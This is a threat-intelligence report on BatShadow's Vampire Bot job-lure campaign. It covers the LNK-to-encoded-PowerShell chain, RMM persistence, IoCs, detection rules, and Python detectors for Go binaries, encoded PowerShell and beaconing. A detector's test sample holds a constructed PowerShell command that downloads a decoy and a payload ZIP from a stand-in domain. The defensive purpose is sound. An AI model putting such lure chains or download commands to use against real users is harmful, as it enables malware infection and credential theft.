BatShadow launches Vampire Bot in fake job campaigns

Threat Group – BatShadow Group
Threat Type – Multi-stage info-stealer and remote access bot
Exploited Vulnerabilities – Social engineering, Windows default “hide known file extensions,” LNK-launched encoded PowerShell, abuse of legitimate remote access software for persistence
Malware Used – Vampire Bot (Go-compiled)
Threat Score – 7.6 🔴 High — Multi-stage chain with LNK→PowerShell execution, behaviour-evasive Go binary, and persistence via legitimate remote-access tooling. Cred theft, host profiling, screenshotting, and flexible C2 raise lateral-movement and data-loss risks.
Last Threat Observation – 8 October 2025
Overview
Vampire Bot is a newly identified, previously undocumented malware attributed to the Vietnam-linked BatShadow Group. First seen in October 2025 targeting job seekers and digital-marketing professionals, the campaign blends tailored phishing, a LNK-to-PowerShell telescoping chain, and persistence through a legitimate remote desktop product to gain durable access, exfiltrate data, and stage follow-on operations.
The critical differentiator is Vampire Bot’s Go (Golang) build, which complicates static signature detection and enables rapid re-compilation to defeat hash-based controls. The initial access arrives in ZIP archives containing a malicious .LNK disguised as a document. When launched, the LNK executes Base64-encoded PowerShell that downloads both a benign decoy document and the primary payloads, including a legitimate remote-access tool (observed: XtraViewer) used for persistence and hands-on control. The Go implant conducts host profiling, information theft, screenshot capture, and C2 beaconing to attacker infrastructure (e.g., a careers-themed domain).
The targeting of marketing and job-seeking cohorts is strategic: these personas often hold or will shortly gain access to high-value corporate SaaS (ads, analytics, social) and may bridge personal and enterprise environments, offering a stealthy beachhead into corporate networks.
Key details
Delivery method
Vector | Details | Detection notes |
---|---|---|
Phishing ZIP | Tailored recruiter/job-offer theme. Archive contains a .LNK posing as a job description or corporate PDF. | Block ZIPs with LNKs. Flag double-extension lures and doc-icon shortcuts. |
Execution deception | Exploits default Windows “hide known file extensions”; filename appears as *.pdf but is actually *.pdf.lnk. | Enforce showing file extensions; educate users to spot .lnk. |
PowerShell stage | LNK launches encoded PowerShell to fetch a decoy PDF and a second ZIP containing XtraViewer, then executes it. | Alert on explorer.exe ➝ powershell.exe with -EncodedCommand or high-entropy args; time-correlate dual fetches. |
Persistence via RMM | XtraViewer (legitimate remote desktop) installed/executed (often from user-writable paths) to blend with normal admin activity. | Application control: only allow sanctioned RMM; block unsigned/volatile-path execution. |
C2 | Go binary communicates with attacker infra, can receive commands and stage modules. | DNS/HTTP egress monitoring, rare-process network baselining, beacon-timing analytics. |
Target
- Primary: Job seekers and digital-marketing professionals (contractors/freelancers included).
- Secondary: Corporate environments reachable through victims’ SaaS credentials, ad platforms, social accounts, or VPN once employment begins.
Functions
- Host profiling and environment reconnaissance to triage victim value.
- Information theft (documents, browser data, credentials, session cookies).
- Screenshot capture on configurable intervals.
- C2 command execution and payload staging for modular extension.
- Persistence and interactive access via a legitimate remote-access tool.
Obfuscation
- Go static linking and easy re-compilation undermine hash/signature detection.
- Social mimicry (job descriptions, corporate themes; file-icon spoofing).
- Living-off-the-land with PowerShell and legitimate RMM (XtraViewer) to reduce telemetry friction.
- Domain impersonation patterns (e.g., careers-themed) for C2 camouflage.
Threat actor profile – BatShadow Group
Attribution and operational cadence
BatShadow has been publicly tracked for at least a year prior to this campaign, operating from Vietnam with persistent, goal-oriented activity. The October 2025 wave focuses on job seeker/marketing demographics to harvest credentials to high-value corporate systems and to seed eventual corporate ingress once victims transition into employer environments.
Evolution and increased sophistication
Historically aligned with MaaS stealers (e.g., Lumma, Agent Tesla), BatShadow’s move to the custom Go-based Vampire Bot represents a capability elevation: bespoke C2, tuned evasion, and resilience against law-enforcement takedowns that frequently disrupt commodity stealer ecosystems. Proprietary tooling reduces dependence on rented infrastructure and extends operational longevity.
Strategic intent and targeting analysis
By compromising individuals at the edge—especially those using personal devices while job hunting—BatShadow creates beachheads outside traditional corporate perimeters. Vampire Bot’s likely info-stealing and RAT features enable credential collection, SaaS account control (ads/social), spear-phishing into employers, and pivoting via VPN once hired.
Technical deep dive – Go binary and telescoping chain
Why Go matters to defence
- Massive statically linked executables complicate AV heuristics and inflate noise for static inspection.
- Re-compilation with minor source changes yields completely new hashes, rendering hash allow/block-lists brittle.
- Symbol stripping hinders reversing; defenders need Go-aware tooling (e.g., pclntab parsing) to recover function metadata and accelerate triage.
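A first step of the Go-aware triage those bullets call for, as an added example in Python that is not part of the original report: it recognises a Go build from the runtime.pclntab header magic (the per-generation values Go's own debug/gosym package matches on) and pulls the "Go build ID:" note string the linker writes. Both survive the -s -w symbol stripping that defeats name-based triage. The two sample blobs are constructed stand-ins, not Vampire Bot samples; a full pclntab parser (Redress, Ghidra Go plugins) would take over from the header offset to recover function names.

```python
"""Triage helper for large unsigned executables: Go build or not, which toolchain generation, which build ID?

Added example, not from the original report. Detection is by the runtime.pclntab header magic
(the per-generation values from Go's debug/gosym) and the "Go build ID:" note string; both survive
the symbol stripping (-s -w) that defeats name-based triage. SAMPLE_GO_BLOB / SAMPLE_NON_GO_BLOB
are constructed stand-ins, not real samples.
"""
import re
import struct

# pclntab magic (little-endian uint32) -> toolchain generation that emits it.
PCLNTAB_MAGIC = {
    0xFFFFFFFB: "Go 1.2-1.15",
    0xFFFFFFFA: "Go 1.16-1.17",
    0xFFFFFFF0: "Go 1.18-1.19",
    0xFFFFFFF1: "Go 1.20+",
}
# The linker writes the build ID as a quoted note string near the start of the text section.
BUILD_ID_RE = re.compile(rb'Go build ID: "([^"\x00]{1,200})"')


def find_pclntab(blob):
    """Return (offset, generation, pointer_size) of the first plausible pclntab header, else None.

    Header layout: magic[4], pad 0x00 0x00, minLC (1 on x86/amd64, 4 on most others), ptrSize (4 or 8).
    The pad/minLC/ptrSize check keeps a stray 0xFFFFFFFx word in data from counting as a hit.
    """
    for magic, generation in PCLNTAB_MAGIC.items():
        needle = struct.pack("<I", magic)
        pos = blob.find(needle)
        while pos >= 0:
            hdr = blob[pos:pos + 8]
            if len(hdr) == 8 and hdr[4] == hdr[5] == 0 and hdr[6] in (1, 2, 4) and hdr[7] in (4, 8):
                return pos, generation, hdr[7]
            pos = blob.find(needle, pos + 1)
    return None


def go_build_id(blob):
    m = BUILD_ID_RE.search(blob)
    return m.group(1).decode("ascii", "replace") if m else None


def triage(blob):
    """Summarise Go-specific evidence in one dict; is_go is True only on a pclntab header hit."""
    hit = find_pclntab(blob)
    return {
        "is_go": hit is not None,
        "pclntab_offset": hit[0] if hit else None,
        "generation": hit[1] if hit else None,
        "ptr_size": hit[2] if hit else None,
        "build_id": go_build_id(blob),
    }


# Constructed stand-ins: a PE-like prefix, a fake build-ID note, then a Go 1.20+ amd64 pclntab header.
SAMPLE_GO_BLOB = (
    b"MZ" + b"\x00" * 62
    + b'\xff Go build ID: "constructed/buildid-0123456789"\n \xff'
    + b"\x00" * 16
    + struct.pack("<I", 0xFFFFFFF1) + b"\x00\x00" + bytes([1, 8]) + b"\x00" * 40
)
SAMPLE_NON_GO_BLOB = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in (("go", SAMPLE_GO_BLOB), ("non-go", SAMPLE_NON_GO_BLOB)):
        print(name, triage(blob))
```

The header check is deliberately stricter than the magic alone: the two zero pad bytes plus a sane minLC/ptrSize pair are what keep a random 0xFFFFFFFx word in a data section from producing a false "Go" verdict. Re-compilation changes the build ID and every hash, but not the pclntab layout, which is why this kind of structural check ages better than a hash list.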
Infection chain mapped to MITRE ATT&CK
Stage | ATT&CK | What to watch for |
---|---|---|
Initial access | TA0001 / T1566.001 Spear-phishing attachment | ZIPs with LNK masquerading as PDFs/docs; decoy+payload pairing. |
User execution | TA0002 / T1204.001 | Shortcut double-click leading to PowerShell; doc-icon .lnk with hidden extension. |
Command & scripting | T1059.001 PowerShell | -EncodedCommand, long Base64/high-entropy arguments; outbound fetch of two artifacts (decoy + payload). |
Persistence | TA0003 / T1547.001 (potential) | RMM foothold; auto-start via registry/startup if configured. |
Defence evasion | TA0005 / T1036 | Legitimate tool execution from %TEMP%/Downloads, unsigned binaries, rare/first-seen processes. |
Collection | TA0009 / T1113 Screen capture | API calls suggesting desktop capture by untrusted processes. |
C2 | TA0011 / T1071 | Regular-interval beacons to new/low-reputation domains. |
Operational note: Some lures instruct victims to use Microsoft Edge for follow-on downloads to bypass stricter Chrome defaults—evidence of pre-tested social engineering.
Known Indicators of Compromise (IoCs)
Treat all network indicators as defanged and contextual. Validate internally before enforcement.
Network
- Domains: api3[.]samsungcareers[.]work (observed C2)
- Beaconing pattern: Regular-interval DNS/HTTPS from first-seen or unsigned processes to new/low-reputation destinations.
Files and persistence
- Artifacts: .lnk files with document icons and double extensions (e.g., *.pdf.lnk) in Downloads/email temp paths.
- RMM foothold: XtraViewer binaries/components executed or installed from %TEMP%, %APPDATA%, Downloads, or launched directly by script interpreters.
- Go payloads: Large, unsigned, first-seen executables in user-writable paths.
Process and telemetry
Type | Indicator (contextual) | Confidence |
---|---|---|
Process ancestry | explorer.exe ➝ powershell.exe with -EncodedCommand or high-entropy command lines | High |
Dual fetch sequence | PowerShell retrieves a decoy PDF followed by a payload ZIP/EXE | Medium–High |
Screen capture | Untrusted process invoking screen-capture-related APIs | Medium |
Hashes
- Not publicly verified for Vampire Bot at time of writing; prefer behaviour-based detections until vendor-confirmed hashes are available.
Detection engineering and rules of thumb
High-fidelity behavioural detections
- LNK → Encoded PowerShell pivot: Parent explorer.exe spawning powershell.exe with -EncodedCommand or high-entropy arguments.
- Unusual binary execution from volatile paths: Unsigned executables or legitimate RMMs (XtraViewer) starting from %TEMP% / %APPDATA% / Downloads.
- Beaconing and rare process egress: First-seen processes generating regular-interval egress to new/low-reputation domains; correlate with process age and signer.
- Screen capture from untrusted process: API usage consistent with desktop capture by recently dropped, unsigned processes.
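The first of those detections, worked through as an added Python example that is not part of the original report: the rule is run over constructed Sysmon Event ID 1 (ProcessCreate) style records, checks the explorer.exe ➝ powershell.exe ancestry, matches the -EncodedCommand flag including the short forms powershell.exe actually accepts, scores the longest argument's Shannon entropy, and decodes the Base64/UTF-16LE script so the decoy-plus-payload pairing can be counted. Hosts, paths and URLs in the samples are constructed (.invalid domains); the thresholds are assumptions to tune against your own baseline.

```python
"""Detection logic for the LNK -> encoded PowerShell pivot, run over constructed Sysmon-style events.

Added example, not from the original report. Each record carries the Sysmon Event ID 1
(ProcessCreate) fields the rule needs; the hosts, paths and .invalid URLs are constructed.
"""
import base64
import math
import re
from collections import Counter

MIN_BLOB_LEN = 64          # assumption: shorter tokens are rarely payload blobs
ENTROPY_THRESHOLD = 4.0    # assumption: bits per character; tune against your baseline
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
PS_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_encoded_flag(token):
    """powershell.exe accepts -e, -ec and any prefix of -EncodedCommand (-enc, -encoded, ...),
    so matching the literal "-EncodedCommand" alone misses trivial variants."""
    if not token.startswith("-") or len(token) < 2:
        return False
    key = token[1:].lower()
    return key == "ec" or "encodedcommand".startswith(key)


def shannon_entropy(s):
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_encoded_command(blob):
    """-EncodedCommand takes Base64 of UTF-16LE script text; return the script or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process_create(ev):
    """Return an alert dict for explorer.exe -> powershell.exe with encoded/high-entropy args, else None."""
    if basename(ev["ParentImage"]) != "explorer.exe" or basename(ev["Image"]) not in PS_IMAGES:
        return None
    tokens = ev["CommandLine"].split()
    reasons, decoded, urls = [], None, []
    for i, tok in enumerate(tokens[:-1]):          # a flag needs a following value
        if is_encoded_flag(tok):
            reasons.append(f"encoded-command flag {tok}")
            decoded = decode_encoded_command(tokens[i + 1])
    longest = max(tokens, key=len, default="")
    if len(longest) >= MIN_BLOB_LEN and shannon_entropy(longest) >= ENTROPY_THRESHOLD:
        reasons.append(f"high-entropy argument ({len(longest)} chars)")
    if decoded:
        urls = URL_RE.findall(decoded)
        if len(urls) >= 2:                          # decoy + payload pairing from the report
            reasons.append(f"dual fetch: {len(urls)} URLs in decoded command")
    if not reasons:
        return None
    return {"event_id": ev["EventId"], "reasons": reasons, "decoded": decoded, "urls": urls}


def run(events):
    return [a for a in (analyse_process_create(e) for e in events) if a]


def ps_encode(script):
    """Only used to build the constructed samples the way -EncodedCommand expects them."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed decoy+payload script; the domain is a placeholder, not an observed indicator.
DECOY_AND_PAYLOAD = ("Invoke-WebRequest http://careers.example.invalid/JD.pdf -OutFile $env:TEMP\\JD.pdf; "
                     "Invoke-WebRequest http://careers.example.invalid/viewer.zip -OutFile $env:TEMP\\v.zip")
SAMPLE_EVENTS = [
    {"EventId": "ev-1", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f'"{PS}" -NoProfile -WindowStyle Hidden -EncodedCommand {ps_encode(DECOY_AND_PAYLOAD)}'},
    {"EventId": "ev-2", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f'"{PS}" -nop -w hidden -enc {ps_encode("Start-Sleep -Seconds 1")}'},
    {"EventId": "ev-3", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": f'"{PS}" -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1'},
    {"EventId": "ev-4", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": f'"{PS}" -EncodedCommand {ps_encode("Get-Date")}'},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert["event_id"], "|", "; ".join(alert["reasons"]))
        if alert["decoded"]:
            print("   decoded:", alert["decoded"])
```

Two points the run makes visible: ev-2 is caught only because the flag matcher understands the short forms, so a rule that greps for the literal "-EncodedCommand" is already bypassed by "-enc"; and ev-4 is ignored by design, because this rule is scoped to the explorer.exe parent the lure produces. Encoded PowerShell launched from cmd.exe, wscript.exe or an Office process needs its own ancestry rule.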
Sysmon/EDR logic suggestions
- Process Create: ParentImage = *\explorer.exe AND Image = *\powershell.exe AND (CommandLine CONTAINS "-EncodedCommand" OR CommandLine MATCHES base64_high_entropy_regex)
- File Creation/Load: (TargetFilename MATCHES *\Downloads\* OR TargetFilename MATCHES *\AppData\*\Temp\*) AND (ImageSigned = false OR Publisher NOT IN allowlist)
- Network: Beaconing detector for new binaries: first_seen_process AND regular_interval_outbound AND (dest_domain_age < 30d OR domain_reputation = low).
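The network rule in that sketch, carried out as an added Python example that is not part of the original report: connections are grouped by (process, destination), the regularity of inter-arrival gaps is scored as a coefficient of variation (standard deviation over mean), and an alert is raised only when a beacon-like pair also comes from a first-seen process and targets a domain that is either under 30 days old or low-reputation. Process paths, domains, timestamps, domain ages and reputation labels are all constructed; the regularity threshold and minimum sample count are assumptions.

```python
"""Beaconing detector for first-seen processes, run over constructed connection events.

Added example, not from the original report. Each event is a dict with the fields an EDR plus a
DNS/HTTP proxy log would supply (image, dest, ts, process_first_seen, domain_age_days, reputation);
every process, domain and timestamp below is constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev

MIN_CONNECTIONS = 5    # assumption: fewer gaps than this cannot establish regularity
MAX_CV = 0.2           # assumption: std-dev / mean of gaps; lower means more clock-like
NEW_DOMAIN_DAYS = 30   # "dest_domain_age < 30d" from the rule sketch


def gap_stats(timestamps):
    """Return (mean_gap, coefficient_of_variation) for sorted timestamps, or None if too few."""
    ts = sorted(timestamps)
    if len(ts) < MIN_CONNECTIONS:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mu = mean(gaps)
    if mu <= 0:
        return None
    return mu, pstdev(gaps) / mu


def detect_beacons(events):
    """Group by (process image, destination) and return one alert per beacon-like pair."""
    groups = defaultdict(list)
    for ev in events:
        groups[(ev["image"], ev["dest"])].append(ev)
    alerts = []
    for (image, dest), evs in groups.items():
        stats = gap_stats([e["ts"] for e in evs])
        if stats is None or stats[1] > MAX_CV:
            continue                                   # irregular or too sparse: not beacon-like
        meta = evs[0]
        if not meta["process_first_seen"]:
            continue                                   # scoped to new binaries, as the sketch says
        new_domain = meta["domain_age_days"] < NEW_DOMAIN_DAYS
        if not (new_domain or meta["reputation"] == "low"):
            continue                                   # established, reputable destination
        alerts.append({
            "image": image, "dest": dest, "connections": len(evs),
            "mean_gap_s": stats[0], "cv": round(stats[1], 3),
            "why": ["regular interval", "first-seen process",
                    "domain < 30d old" if new_domain else "low reputation"],
        })
    return alerts


def _series(image, dest, start, gaps, first_seen, age_days, reputation):
    """Build a constructed connection series from a start time and a list of gaps."""
    evs, t = [], start
    for g in [0] + gaps:
        t += g
        evs.append({"ts": t, "image": image, "dest": dest, "process_first_seen": first_seen,
                    "domain_age_days": age_days, "reputation": reputation})
    return evs


SAMPLE_CONNECTIONS = (
    # Beacon-like: jittered 60 s cadence, dropped binary, 12-day-old careers-themed domain.
    _series(r"C:\Users\jdoe\AppData\Local\Temp\jd_viewer.exe", "api3.careers.example.invalid",
            1_700_000_000, [60, 62, 59, 61, 60, 58, 60], True, 12, "unknown")
    # Regular but well-known software to an established domain: stays quiet.
    + _series(r"C:\Program Files\Collab\collab.exe", "sync.collab.example.com",
              1_700_000_000, [30] * 9, False, 3100, "good")
    # First-seen installer with a regular cadence, but old reputable domain: stays quiet.
    + _series(r"C:\Users\jdoe\Downloads\vendor-agent.exe", "updates.vendor.example.org",
              1_700_000_005, [120, 120, 121, 119, 120], True, 2500, "good")
    # Human browsing: irregular gaps.
    + _series(r"C:\Program Files\Browser\browser.exe", "news.example.net",
              1_700_000_010, [4, 91, 7, 300, 2, 45, 13], False, 4000, "good")
)

if __name__ == "__main__":
    for a in detect_beacons(SAMPLE_CONNECTIONS):
        print(f'{a["image"]} -> {a["dest"]}: {a["connections"]} conns, '
              f'mean gap {a["mean_gap_s"]}s, cv {a["cv"]}; {", ".join(a["why"])}')
```

The third series is the one worth dwelling on: it beacons just as regularly from a first-seen binary, and only the domain-age/reputation leg of the AND keeps it from paging anyone, which is exactly the trade-off the sketch encodes. Sparse histories (under MIN_CONNECTIONS samples) return no verdict rather than a negative one, so a fresh implant is not cleared before it has had time to beacon.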
Mitigation and prevention
The 3 Cs — immediate actions
Containment
Isolate endpoints showing the LNK→PowerShell chain, dual downloads, or unsanctioned RMM installs. Acquire memory and volatile data for triage.
Contextual detection
Emphasise behavioural detections: parent-child pivots, encoded commands, rare process egress, volatile-path execution, and screen-capture activity.
Countermeasures
Disable “Hide extensions for known file types.” Enforce application allow-listing and strictly control RMM usage by publisher and path.
Mitigation Checklist
Category | Control / Action | Objective | Verification / Status |
---|---|---|---|
User Awareness & Training | Conduct targeted awareness campaigns for HR, marketing, and recruitment teams about ZIP + LNK phishing and hidden file extensions. Include real-world simulation exercises. | Prevent social engineering success through user education. | ☐ Implemented ☐ In Progress ☐ Gap |
Email & Attachment Filtering | Block inbound ZIP archives containing .LNK or executable files. Apply sandbox detonation for attachments using recruiter or job-offer themes. | Stop the initial infection vector before delivery to the endpoint. | ☐ ☐ ☐ |
File Extension Visibility | Enforce Group Policy to disable “Hide extensions for known file types” across all Windows endpoints. | Defeat the visual deception used in Vampire Bot lures. | ☐ ☐ ☐ |
Endpoint Protection (EDR/AV) | Deploy EDR rules to detect explorer.exe ➝ powershell.exe -EncodedCommand execution, large unsigned Go binaries, and PowerShell-launched RMM installs. | Detect high-fidelity behavioural indicators of compromise. | ☐ ☐ ☐ |
Application Control / Whitelisting | Allow only approved remote access tools (e.g., legitimate RMM). Block unsanctioned software such as XtraViewer when not explicitly authorized. Restrict binary execution from %TEMP%, Downloads, and AppData. | Eliminate malicious persistence via legitimate tools or transient directories. | ☐ ☐ ☐ |
PowerShell Hardening | Enable Constrained Language Mode where practical. Require signed scripts, enforce execution policy, and enable full Script Block Logging and transcription to SIEM. | Limit abuse of PowerShell for encoded or obfuscated payloads. | ☐ ☐ ☐ |
Network & DNS Monitoring | Monitor for regular-interval beaconing and connections to new or low-reputation domains (e.g., careers-themed). Alert on unusual JA3/SNI patterns from unsigned binaries. | Detect C2 communications and data exfiltration activity. | ☐ ☐ ☐ |
SaaS and Identity Security | Enforce MFA/2FA across all SaaS and corporate accounts. Monitor for unusual logins from new devices or regions. | Reduce the value of stolen credentials. | ☐ ☐ ☐ |
System Hardening & Patching | Apply latest OS and browser updates. Enable SmartScreen, Attack Surface Reduction (ASR) rules, and disable legacy scripting engines. | Reduce exploit surface and block common file-based attacks. | ☐ ☐ ☐ |
Incident Response Readiness | Update playbooks for LNK-to-PowerShell and Go-binary analysis. Pre-install tools such as Redress or Ghidra Go plugins for rapid reversing. | Decrease response time during live incidents involving Go malware. | ☐ ☐ ☐ |
Threat Hunting & Continuous Monitoring | Establish recurring hunts for volatile-path executions, PowerShell encoded commands, and screen-capture API calls. Integrate telemetry with SIEM for correlation. | Maintain ongoing visibility and early detection of evolving variants. | ☐ ☐ ☐ |
Credential & Session Hygiene | Immediately rotate passwords and revoke tokens when compromise is suspected, especially for ad-platform and marketing accounts. | Limit post-infection lateral movement and data theft. | ☐ ☐ ☐ |
Data Loss Prevention (DLP) | Monitor for unusual outbound file transfers, screenshot exfiltration, or compressed data archives leaving endpoints. | Detect and block data theft attempts. | ☐ ☐ ☐ |
Post-Incident Recovery | Validate that RMM tools (like XtraViewer) are removed or re-installed from trusted sources only. Perform endpoint re-imaging where compromise is confirmed. | Ensure full remediation and removal of persistent footholds. | ☐ ☐ ☐ |
Risk assessment
- Likelihood: Medium–High
- Impact: High
- Detectability: Medium
- Overall: 7.6 High — warrants full incident response on confirmed cases and proactive hardening.
Conclusion
Vampire Bot marks a tactical escalation for BatShadow: from commodity stealers to a custom Go-compiled platform delivered via LNK-to-PowerShell chains, with persistence through legitimate remote-access software. Success depends on behavioural analytics, UI hardening (show extensions), and tight RMM governance. With these controls, the campaign’s noisy pivots become detectable and containable.
Sources
The Hacker News – BatShadow Group Uses New Go-Based Vampire Bot Malware to Hunt Job Seekers – https://thehackernews.com/2025/10/batshadow-group-uses-new-go-based.html
SecurityBrief – BatShade: Vietnamese threat actor expands its digital operations – https://securitybrief.asia/story/batshade-vietnamese-threat-actor-expands-its-digital-operations